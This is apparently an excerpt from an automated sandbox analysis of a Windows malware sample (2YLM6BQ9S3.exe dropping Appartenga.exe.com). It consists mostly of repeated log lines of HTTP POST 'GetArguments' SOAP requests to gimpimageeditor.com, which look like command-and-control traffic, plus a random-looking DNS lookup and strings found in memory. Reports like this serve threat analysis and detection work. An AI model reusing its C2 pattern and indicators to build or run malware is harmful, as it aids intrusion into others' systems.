              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,6_2_00C429BA
              Source: global trafficDNS traffic detected: DNS query: FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro
              Source: global trafficDNS traffic detected: DNS query: gimpimageeditor.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
              Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
